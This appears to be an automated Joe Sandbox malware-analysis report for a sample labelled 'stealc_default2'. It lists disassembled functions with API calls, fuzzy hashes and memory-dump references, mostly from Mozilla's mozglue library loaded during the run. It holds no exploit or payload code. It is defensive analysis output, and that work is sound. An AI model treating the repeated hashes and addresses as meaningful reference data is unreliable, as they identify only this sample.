Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: e4756a5f0b9d695e6a8152d00353619c6719ca071e4825c36f5a8a21cd3a8a4a
Instruction ID: c9d0a83434e63665b7de63b127a1bb7a144230e9f090ad7fe190edd601c3fa25
Opcode Fuzzy Hash: e4756a5f0b9d695e6a8152d00353619c6719ca071e4825c36f5a8a21cd3a8a4a
Instruction Fuzzy Hash: 2961D371A083489FCB10CF38C581A5BB7E5FF8A344F44472EF88597251DB38D98587A2

Function 6BAB0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0A72

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

moz_xmalloc.MOZGLUE(?,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0AF5
free.MOZGLUE(00000000,?,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0B9F
free.MOZGLUE(?,?,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0BDB
free.MOZGLUE(00000000,?,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6BB0B80C,00000000,?,?,6BAB003B,?), ref: 6BAB0C0A

Strings

alloc overflow, xrefs: 6BAB0C05

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: a74239600cf377101f1cc7a0647501c8128c57dfed8b0b0d7588d06b99b30bb2
Instruction ID: b3c944641cb975532d33f142406cc15bdfbb5885891e2c0a62b7d9ff077f0536
Opcode Fuzzy Hash: a74239600cf377101f1cc7a0647501c8128c57dfed8b0b0d7588d06b99b30bb2
Instruction Fuzzy Hash: B751B270A002068FDF24CF28C9C0A5EB3BAFF44308F15496DC46A9B201EB75E584CB51

Function 6BAF1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAF124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAF1268
GetCurrentThreadId.KERNEL32 ref: 6BAF12DA
InitializeConditionVariable.KERNEL32(?), ref: 6BAF134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6BAF138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6BAF1431

Part of subcall function 6BAE8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BB01563), ref: 6BAE8BD5

free.MOZGLUE(?), ref: 6BAF145A
free.MOZGLUE(?), ref: 6BAF146C

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: e456d71112ce4db5752a2e84b8c0b04c3efdfd0f7052697523b6e3a37948e2f1
Instruction ID: 9a85130717092714bc629f4c55797a9980f1ee334f7ce97e785a2af249742882
Opcode Fuzzy Hash: e456d71112ce4db5752a2e84b8c0b04c3efdfd0f7052697523b6e3a37948e2f1
Instruction Fuzzy Hash: 2B61BFB59043449BDF10DF24C981BAAB7F9BFC5308F04891DE99947211EB79E486CB42

Function 6BAA4B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6BAA4667,?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4C63
free.MOZGLUE(?,?,?,6BAA4667,?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4C89
free.MOZGLUE(?,?,?,6BAA4667,?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4CAC
free.MOZGLUE(?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BAA4667,?,?,?,?,?,?,?,?,6BAE4843,?), ref: 6BAA4DD1

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: acd60edb48f075836db0af624ab5647470617eaa4bb427ade7c07fcced5180f5
Instruction ID: 973fb1bba603abce7ad8cc137e9db347eda8560ac6e458d0562638d5692b29f9
Opcode Fuzzy Hash: acd60edb48f075836db0af624ab5647470617eaa4bb427ade7c07fcced5180f5
Instruction Fuzzy Hash: E7518371504A408FEB248A3DD9A4756B7A2AF01728F444A1DF1ABCBBD1EF39A4C48752

Function 6BAAE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6BAB1999), ref: 6BAAEA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BAAEA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BAAEA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6BAB1999), ref: 6BAAEA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BAB1999), ref: 6BAAEAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BAAEADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BAAEB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BAAEB27

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: ce8cf953d6e7649cd224088b172d3a2dee7faaef5b7059b2755880e7b32b7429
Instruction ID: d57b0e0d999030b643b2ed573c76677915d9035901d0c09048ef42924aa486fb
Opcode Fuzzy Hash: ce8cf953d6e7649cd224088b172d3a2dee7faaef5b7059b2755880e7b32b7429
Instruction Fuzzy Hash: F141B3B1A00215DFDF14CF68DC81AAE77A9FF45264F240638E825EB394E735EA4487E1

Function 6BAFD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAFD36B
GetCurrentThreadId.KERNEL32 ref: 6BAFD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAFD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAFD3E1
free.MOZGLUE ref: 6BAFD408

Part of subcall function 6BADCBE8: GetCurrentProcess.KERNEL32(?,6BAA31A7), ref: 6BADCBF1
Part of subcall function 6BADCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BAA31A7), ref: 6BADCBFA

GetCurrentThreadId.KERNEL32 ref: 6BAFD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAFD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BAFD472

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 8e082b73743f540b56ad639fca365b9fd75cb4a4b21879db690fa7c47e65670e
Instruction ID: f56abae6900973542696b041bf37a1b3064d1ce09c6e5678eebf323a9a35a16a
Opcode Fuzzy Hash: 8e082b73743f540b56ad639fca365b9fd75cb4a4b21879db690fa7c47e65670e
Instruction Fuzzy Hash: 8941D0759043058FCB14DF64C485AAFBBB9FF85314F104A2EE9A687340EB36E885CB91

Function 6BAE4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BAE4AB7,?,6BAA43CF,?,6BAA42D2), ref: 6BAE4B48
free.MOZGLUE(?,?,?,80000000,?,6BAE4AB7,?,6BAA43CF,?,6BAA42D2), ref: 6BAE4B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BAE4AB7,?,6BAA43CF,?,6BAA42D2), ref: 6BAE4B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BAE4AB7,?,6BAA43CF,?,6BAA42D2), ref: 6BAE4BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BAE4AB7,?,6BAA43CF,?,6BAA42D2), ref: 6BAE4BEE

Strings

pid:, xrefs: 6BAE4BE8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: acf2c8c075cdfff08955a6d1c659151094286db66fd1622716b83ff7cc97a783
Instruction ID: 80715793308cb9d00ece79961751c3ad7ede33fe5da7a0c48cf1d60f9e2ae818
Opcode Fuzzy Hash: acf2c8c075cdfff08955a6d1c659151094286db66fd1622716b83ff7cc97a783
Instruction Fuzzy Hash: DA41F7717042559BCF14CFBCEC805AFBBE9AF85224B140639E869DB381DB34994587B1

Function 6BB0AAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6BB2E220,?), ref: 6BB0BC2D
ReleaseSRWLockExclusive.KERNEL32(6BB2E220), ref: 6BB0BC42
RtlFreeHeap.NTDLL(?,00000000,6BB1E300), ref: 6BB0BC82
RtlFreeUnicodeString.NTDLL(6BB2E210), ref: 6BB0BC91
RtlFreeUnicodeString.NTDLL(6BB2E208), ref: 6BB0BCA3
RtlFreeHeap.NTDLL(?,00000000,6BB2E21C), ref: 6BB0BCD2
free.MOZGLUE(?), ref: 6BB0BCD8

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: e93a5c9e1ac77764b2633606f28ab6b16f3ab1cd882b69a2fded992abdfef488
Instruction ID: c3cdfdcca7f853c06bdded91bde5f8b14563b6ab8c74d05406cd3712a5482247
Opcode Fuzzy Hash: e93a5c9e1ac77764b2633606f28ab6b16f3ab1cd882b69a2fded992abdfef488
Instruction Fuzzy Hash: 5121CE725407949FE7308F16C880BBABBA9FF45714F048469E81A5B650CFB9F841CB91

Function 6BAFD1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BAFD1EC
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAFD1F5

Part of subcall function 6BAFAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BAFAE20

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAFD211
GetCurrentThreadId.KERNEL32 ref: 6BAFD217
AcquireSRWLockExclusive.KERNEL32(?), ref: 6BAFD226
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAFD279
free.MOZGLUE(?), ref: 6BAFD2B2

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 4e16e15774953ab8b20272f254a20d760798346246eeacbb04e9fa78914839b8
Instruction ID: 2fed54f4e226c09b7f809366a8ba68388c46b63887f0f715062ef216b1d13e70
Opcode Fuzzy Hash: 4e16e15774953ab8b20272f254a20d760798346246eeacbb04e9fa78914839b8
Instruction Fuzzy Hash: 26216D71604305AFCB15DF24C488AAEB7B5FF8A324F50462EF95687340DB35E846CB96

Function 6BAE99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BAB4A68), ref: 6BAE945E
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BAE9470
Part of subcall function 6BAE9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BAE9482
Part of subcall function 6BAE9420: __Init_thread_footer.LIBCMT ref: 6BAE949F

GetCurrentThreadId.KERNEL32 ref: 6BAE99C1
AcquireSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAE99CE
ReleaseSRWLockExclusive.KERNEL32(6BB2F4B8), ref: 6BAE99F8
GetCurrentThreadId.KERNEL32 ref: 6BAE9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAE9A0D

Part of subcall function 6BAE9A60: GetCurrentThreadId.KERNEL32 ref: 6BAE9A95
Part of subcall function 6BAE9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BAE9A9D
Part of subcall function 6BAE9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BAE9ACC
Part of subcall function 6BAE9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAE9BA7
Part of subcall function 6BAE9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BAE9BB8
Part of subcall function 6BAE9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BAE9BC9

Part of subcall function 6BADCBE8: GetCurrentProcess.KERNEL32(?,6BAA31A7), ref: 6BADCBF1
Part of subcall function 6BADCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BAA31A7), ref: 6BADCBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BAE9A15

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 707c20d7f8b4942848625a101d53d3853e4cb8e5eb600a5b7e7ba1a440ff06ea
Instruction ID: fe48f413f74eec4106124c882a0968bf6bb6b94d613638742c9b7702ff468327
Opcode Fuzzy Hash: 707c20d7f8b4942848625a101d53d3853e4cb8e5eb600a5b7e7ba1a440ff06ea
Instruction Fuzzy Hash: AF0122798042649FEF205F28DA096793B68EF42668F040017ED1953302DB7E8883D6B1

Function 6BAB62E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6BADAB89: EnterCriticalSection.KERNEL32(6BB2E370,?,?,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284), ref: 6BADAB94
Part of subcall function 6BADAB89: LeaveCriticalSection.KERNEL32(6BB2E370,?,6BAA34DE,6BB2F6CC,?,?,?,?,?,?,?,6BAA3284,?,?,6BAC56F6), ref: 6BADABD1

LoadLibraryW.KERNEL32(combase.dll), ref: 6BAB631B
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BAB633A
__Init_thread_footer.LIBCMT ref: 6BAB634E
FreeLibrary.KERNEL32 ref: 6BAB6376

Strings

CoUninitialize, xrefs: 6BAB6334
combase.dll, xrefs: 6BAB6316

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 7a23e023633905b3c6a2b5524cb26246fb086c0e9aee7550b325586debc0616a
Instruction ID: e6e4f8788285795d1736388fabc21c68695d7bfce1092fb72d5cb84e98221ea9
Opcode Fuzzy Hash: 7a23e023633905b3c6a2b5524cb26246fb086c0e9aee7550b325586debc0616a
Instruction Fuzzy Hash: 92012176905201CFEF109F3CDA58B74B7A5BB0A715F04416ADA11C3380DB3AE482CF56

Function 6BAF9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAF9BAE
free.MOZGLUE(?,?), ref: 6BAF9BC3
free.MOZGLUE(?,?), ref: 6BAF9BD9

Part of subcall function 6BAF93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAF94C8
Part of subcall function 6BAF93B0: free.MOZGLUE(6BAF9281,?), ref: 6BAF94DD

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: e63e481707d8ef3df3c3fa4da58195984d60eb263c5c50c041ed3aaae02bd838
Instruction ID: 1e28b64823be85a0bd838d81af4b778197ad64cbbfb090da89949ff9c555d2fb
Opcode Fuzzy Hash: e63e481707d8ef3df3c3fa4da58195984d60eb263c5c50c041ed3aaae02bd838
Instruction Fuzzy Hash: 6FB1BF71A047048BCF01CF68C58159FF3F9BFC9324F548659E8599B242DB35E986CB92

Function 6BAE71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6BAE6060: moz_xmalloc.MOZGLUE(00000024,2C9152B3,00000000,?,00000000,?,?,6BAE5FCB,6BAE79A3), ref: 6BAE6078

free.MOZGLUE(-00000001), ref: 6BAE72F6
free.MOZGLUE(?), ref: 6BAE7311

Strings

Copied unique strings, xrefs: 6BAE7320
333s, xrefs: 6BAE7226
333s, xrefs: 6BAE731B
Spliced unique strings, xrefs: 6BAE7340

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 06d103e0401d6eeeb6185fbcef3a07ca406270710ceb97151b2a335686c5ac93
Instruction ID: 8c5d4a16db93e5677b833cbe91078b1f920db00b266f760fca8ae09c9934bb3d
Opcode Fuzzy Hash: 06d103e0401d6eeeb6185fbcef3a07ca406270710ceb97151b2a335686c5ac93
Instruction Fuzzy Hash: 0371A771F002158FDF08CF69D8906ADB7F2AF84304F29812DD819A7311DB39A987DB91

Function 6BAECA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6BAECA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAECA69
Sleep.KERNEL32 ref: 6BAECADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BAECAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BAECAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6BAECB19

Memory Dump Source

Source File: 0000000E.00000002.2919748669.000000006BAA1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6BAA0000, based on PE: true

Associated: 0000000E.00000002.2919680989.000000006BAA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2920107247.000000006BB1D000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926808185.000000006BB2E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 0000000E.00000002.2926981783.000000006BB32000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6baa0000_stealc_default2.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: f5662549e8903bbe221d37ce5350c1d612474d413f6a500043de3c25cb4e80c6
Instruction ID: 4d62717adb3dec40479ce3ca7f0817107638d5f38799dc20f0fc8c0b7bf43798
Opcode Fuzzy Hash: f5662549e8903bbe221d37ce5350c1d612474d413f6a500043de3c25cb4e80c6
Instruction Fuzzy Hash: 45213731A046488BCB089B38A84617FFBBAFFC6305F808629E845A7180FF75D5C58792

Function 6BAAEB90 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000104), ref: 6BAAEBB5

Part of subcall function 6BABCA10: malloc.MOZGLUE(?), ref: 6BABCA26

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6BADD7F3), ref: 6BAAEBC3
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6BADD7F3), ref: 6BAAEBD6
free.MOZGLUE(?,?,?,?,?,?,6BADD7F3), ref: 6BAAEBF6
free.MOZGLUE(00000000,?,?,?,?,?,?,6BADD7F3), ref: 6BAAEC0E

Part of subcall function 6BAC5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BAC5EDB
